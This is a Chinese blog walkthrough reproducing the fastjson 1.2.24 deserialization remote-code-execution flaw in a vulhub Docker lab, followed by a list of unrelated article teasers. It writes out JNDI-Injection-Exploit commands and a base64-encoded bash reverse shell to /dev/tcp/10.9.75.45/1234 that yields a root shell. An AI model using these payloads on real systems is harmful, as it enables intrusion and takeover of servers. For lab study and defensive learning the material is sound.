fastjson漏洞复现

文章目录

  • 启动环境
  • 漏洞复现
    • 下载bp插件
    • 漏洞扫描
    • dnslog测试是否向外请求资源
    • 用工具构造rmi服务器
  • 反弹shell

启动环境

到vulhub目录下

cd vulhub/fastjson/1.2.24-rce

安装环境并启动:

sudo docker-compose up -d && sudo docker-compose up -d

启动成功,如图:

在这里插入图片描述

查看端口发现是8090,打开bp内置浏览器,输入10.9.75.45:8090打开环境:

在这里插入图片描述

漏洞复现

FastJson 是Alibab的一款开源Json 解析库,可用于将Java 对象转换为其Json 表示形式,也可以用于将Json 字符串转换为等效的Java 对象。近几年来FastJson 漏洞层出不穷。RCE 漏洞的源头:17年FastJson 爆出的1.2.24 反序列化漏洞。
关于FasiJson 1.2.24 反序列化漏洞,简单来说,就是FastJson 通过parsebiect/parse 将传入的字符由反广列化为Java 对象时由于没有进行合理检查而导致的。

打开环境后用bp抓包,Ctrl+r发送到repeater模块,右键改为post方法,将content-type字段改为application/json,然后添加一个json格式的数据并提交:

{"name":"EMT","age":24}

上传成功:

在这里插入图片描述

这个过程中:json-> object -> json,进行了序列化和反序列化

下载bp插件

到网站Releases · Maskhe/FastjsonScan (github.com),复制FastjsonScan.jar包的地址:

在这里插入图片描述

在kali中到下面目录:

cd tools/burpsuite/extensions

新建一个目录:

mkdir Fastjosnscan

到新建的目录下,输入命令拉取FastjsonScan.jar包:

proxychains wget https://github.com/Maskhe/FastjsonScan/releases/download/1.0/FastjsonScan.jar

在bp中选择extensions,点击add,添加插件:
在这里插入图片描述

安装插件已完成:

在这里插入图片描述

漏洞扫描

来到repeater模块,将数据包发送到FastjsonScan:

在这里插入图片描述

发送后等待扫描结束后发现漏洞,得到漏洞利用的poc:
在这里插入图片描述

poc中有rmi,它相当于Java的http协议,通过它可以远程执行引用一个外部类。

dnslog测试是否向外请求资源

生成一个URL:

在这里插入图片描述

用lbap测试是否有URL跳转:

在这里插入图片描述

测试成功。有URL跳转,向外部请求资源:

在这里插入图片描述

用工具构造rmi服务器

cd tools

新建一个文件夹JNDI-Injection-Exploit,进入该目录,输入命令下载工具:

sudo wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

下载完成后在该目录下执行命令:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/EMT" -A "10.9.75.45"

成功构建出服务器,显示出URL:

在这里插入图片描述

用生成的URL到数据包中提交,如果成功就可以在容器的tmp目录下创建一个EMT文件,点击send后报错,返回号500:

在这里插入图片描述

用命令查看容器ID:

sudo docker ps -a

如图:
在这里插入图片描述

登录容器:

sudo docker exec -it 26ad /bin/bash

如图,登录成功:

在这里插入图片描述

查看tmp目录下的文件,写入文件成功:

在这里插入图片描述

反弹shell

用上面的漏洞可以写一个反弹shell命令来获取对方的shell:

反弹shell命令,端口设为1234:

bash -i >& /dev/tcp/10.9.75.45/1234 0>&1

进行base64编码:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ==

将base64编码组成下面命令

bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}

同上,用工具构造一个可以发送的url:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "10.9.75.45"

如图,构造成功:

在这里插入图片描述

监听1234端口:
在这里插入图片描述

复制一条URL到数据包中点击发送:
在这里插入图片描述

反弹shell成功,获取到root权限:

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/73528.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

详解TCP/IP的三次握手和四次挥手

详解TCP/IP的三次握手和四次挥手

文章目录 前言一、TCP/IP协议的三次握手1.1 三次握手流程 二、TCP/IP的四次挥手2.1 四次挥手流程 三、主要字段3.1、标志位(Flags)3.2、序号(sequence number)3.3、确认号(acknowledgement number) 四、状态…
阅读更多...
MySQL——事务

MySQL——事务

一、事务的开始与结束 一个数据库事务由一条或多条sql语句构成,它们形成一个逻辑的工作单元。这些sql语句要么全部执行成功,要么全部执行失败。 1.1.事物的开始 1.对于DDL(create,alter,drop)和DCL&…
阅读更多...
Java 中如何实现序列化?

Java 中如何实现序列化?

什么是序列化?Java 中如何实现序列化? 在 Java 编程中,序列化是一种将对象转换为字节流的过程,可以将对象在网络中传输或者保存到磁盘中。序列化可以将对象的状态保存下来,以便在需要时重新创建对象。Java 中提供了一…
阅读更多...
Android 10.0 禁用adb shell input输入功能

Android 10.0 禁用adb shell input输入功能

1.前言 在10.0的产品开发中,在进行一些定制开发中,对于一些adb shell功能需要通过属性来控制禁止使用input 等输入功能,比如adb shell input keyevent 响应输入事件等,所以就需要 熟悉adb shell input的输入事件流程,然后来禁用adb shell input的输入事件功能,接下来分…
阅读更多...
【数据结构--顺序表】移除元素

【数据结构--顺序表】移除元素

题目描述&#xff1a; 代码实现&#xff1a; 1、指针实现 int removeElement(int* nums, int numsSize, int val) {int* dst nums, * src nums;int n1 0,n20;while (n1n2 < numsSize){if (*src ! val){*dst *src;dst;src;n1;//表示src走的步数}else{src;n2;//表示src走…
阅读更多...
【C++心愿便利店】No.5---构造函数和析构函数

【C++心愿便利店】No.5---构造函数和析构函数

文章目录 前言一、类的6个默认成员函数二、构造函数三、析构函数 前言 &#x1f467;个人主页&#xff1a;小沈YO. &#x1f61a;小编介绍&#xff1a;欢迎来到我的乱七八糟小星球&#x1f31d; &#x1f4cb;专栏&#xff1a;C 心愿便利店 &#x1f511;本章内容&#xff1a;类…
阅读更多...
GO远程构建并调试

GO远程构建并调试

GO远程调试 之前写C&#xff0c;一直习惯了本地IDERemote CMake/GDB编译调试的模式。 因为6.824课程需要用GO&#xff0c;好像没有特别好的支持。记录一下如何配置调试的。 IDE: Goland 操作系统&#xff1a;Windows 远程服务器&#xff1a;Ubuntu 首先配置SSH,让其可以连接到…
阅读更多...
source insight keil 中文乱码

source insight keil 中文乱码

1. 乱码的根本原因就是编码的方式太多了&#xff0c;你用这种编码&#xff0c;他用那种编码&#xff0c;就变成鸡同鸭讲了&#xff0c;对牛弹琴就要用牛语&#xff0c;如果全世界只有一种编码方式&#xff0c;就肯定不会有乱码问题&#xff0c;但这是不可能的。keil 设置编码格…
阅读更多...
SpringMVC入门篇

SpringMVC入门篇

目录 1.SpringMVC工作流程 2.SpringMVC核心组件 2.1 DispatcherServlet 2.2 HandlerMapping 2.3 Handler 2.4 HandlerAdapter 2.5 ViewResolver 2.6 View 3.SpringMVC的入门 3.1 添加相关依赖 3.2 创建Spring-mvc.xml 3.3 配置web.xml 3.4 效果演示 4.静态资源处…
阅读更多...
二叉搜索树

二叉搜索树

如何搜索构建一颗二叉搜索树插入删除 如何搜索 在二叉搜索树里搜索值&#xff1b;搜索非常类似于二分查找 //查找key是否存在public TreeNode search(int key) {TreeNode cur root;while(cur ! null) {if(cur.key key) {return cur;}else if(cur.key > key){cur cur.lef…
阅读更多...
【Python】Python运算符/部分函数对应的双下划线魔法方法

【Python】Python运算符/部分函数对应的双下划线魔法方法

先说下Python版本&#xff1a;【Python 3.7.8】 以下用图片表格展示&#xff0c;一是防扒&#xff0c;二是没精力改成md格式。 还有就是内容肯定没有完全包含(而且也很难做到)&#xff0c;像是__reduce__与py自带模块pickle有关(pickle用于对象序列化/反序列化)、sys.getsizeo…
阅读更多...
SQLAlchemy 封装的工具类,数据库pgsql(数据库连接池)

SQLAlchemy 封装的工具类,数据库pgsql(数据库连接池)

1.SQLAlchemy是什么&#xff1f; SQLAlchemy 是 Python 著名的 ORM 工具包。通过 ORM&#xff0c;开发者可以用面向对象的方式来操作数据库&#xff0c;不再需要编写 SQL 语句。 SQLAlchemy 支持多种数据库&#xff0c;除 sqlite 外&#xff0c;其它数据库需要安装第三方驱动。…
阅读更多...
20230904 QT客户端服务器搭建聊天室

20230904 QT客户端服务器搭建聊天室

Ser cpp#include "app.h" #include "ui_app.h"APP::APP(QWidget *parent):QWidget(parent),ui(new Ui::APP) {ui->setupUi(this);this->resize(550,400);ui->Line->setAlignment(Qt::AlignCenter);//标签文本对齐方式 居中ui->Line->se…
阅读更多...
力扣:83. 删除排序链表中的重复元素(Python3)

力扣:83. 删除排序链表中的重复元素(Python3)

题目&#xff1a; 给定一个已排序的链表的头 head &#xff0c; 删除所有重复的元素&#xff0c;使每个元素只出现一次 。返回 已排序的链表 。 来源&#xff1a;力扣&#xff08;LeetCode&#xff09; 链接&#xff1a;力扣&#xff08;LeetCode&#xff09;官网 - 全球极客挚…
阅读更多...
群晖NAS:通过Docker 部署宝塔面板【注册表:cyberbolt/baota】

群晖NAS:通过Docker 部署宝塔面板【注册表:cyberbolt/baota】

群晖NAS&#xff1a;通过 Docker 部署宝塔面板【注册表&#xff1a;pch18/baota】 由于 docker 源地址被墙&#xff0c;在面板里面查询不到注册表&#xff0c;使用 ssh 命令行拉取 1、打开 SSH&#xff0c;链接后打开命令行 这里不赘述&#xff0c;具体自行百度 2、下载 镜像…
阅读更多...
origin中optimal cluster安装报错解决

origin中optimal cluster安装报错解决

1.在安装之后程序运行出错&#xff0c;报错信息为缺少numpy包。解决办法&#xff1a;打开窗口-脚本窗口&#xff0c;用pip安装numpy&#xff0c;其他缺少的包可用同样方法解决。 2.有的包在外部python中才有&#xff0c;通过origin无法下载。解决办法&#xff1a;在连接-python…
阅读更多...
PHP对接阿里云虚拟号的实现(号码隐私保护)

PHP对接阿里云虚拟号的实现(号码隐私保护)

fastadmin 封装框架 实现功能&#xff1a;AXN隐私号绑定、解绑&#xff1b; 场景&#xff1a;为店铺手机号开通虚拟号&#xff0c;用户联系店铺展示虚拟号码&#xff1b; 官方开放文档地址&#xff1a;https://help.aliyun.com/document_detail/59655.html?spma2c4g.111742…
阅读更多...
营销邮件主题怎么写?编写邮件主题的技巧?

营销邮件主题怎么写?编写邮件主题的技巧?

如何创建营销邮件主题&#xff1f;制作EDM邮件主题的方法策略&#xff1f; 营销邮件主题在整个营销邮件中起着至关重要的作用&#xff0c;它是吸引读者打开邮件的第一步。蜂邮EDM将分享一些关于如何撰写令人惊艳的营销邮件主题的技巧&#xff0c;帮助您吸引更多的目标受众。 …
阅读更多...
【高德地图】 覆盖物/画点/画折线/画多边形/画矩形/画圆

【高德地图】 覆盖物/画点/画折线/画多边形/画矩形/画圆

官方示例 https://lbs.amap.com/demo/javascript-api/example/mouse-operate-map/mouse-draw-overlayers <!doctype html> <html lang"en"><head><meta charset"utf-8"><meta http-equiv"X-UA-Compatible" content…
阅读更多...
微信小程序中 vant weapp 使用外部的icon作为图标的步骤

微信小程序中 vant weapp 使用外部的icon作为图标的步骤

微信小程序中 vant weapp 使用外部的icon作为图标的步骤 1. 在项目中创建静态资源文件夹2. 前往iconfont图标官网&#xff0c;添加图标并拷贝在线链接3. 下载iconfont代码&#xff0c;解压之后拷贝到小程序的目录中4. 修改iconfont.wxss 将本地链接替换为在线链接5. 在项目的ap…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023